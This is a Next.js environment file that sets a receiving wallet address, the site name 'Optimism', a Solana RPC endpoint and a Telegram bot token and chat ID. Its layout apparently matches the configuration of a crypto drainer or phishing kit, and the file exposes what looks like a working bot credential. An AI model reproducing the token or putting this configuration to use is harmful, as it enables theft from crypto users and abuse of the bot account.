NEXT_PUBLIC_TO=0x020793d9aB8F5DD9Eb4816b5A67C08b00065f699
NEXT_PUBLIC_SITE_NAME=Optimism
NEXT_PUBLIC_IMAGE='/images/portfolio-06.jpg'
NEXT_PUBLIC_SOLANA_RPC_URL=https://api.mainnet-beta.solana.com
NEXT_PUBLIC_TELEGRAM_BOT_TOKEN=7038517634:AAFeIJ5tN16MVru71lwpm_YFOdzta3x2Jy8
NEXT_PUBLIC_TELEGRAM_CHAT_ID=6675825365
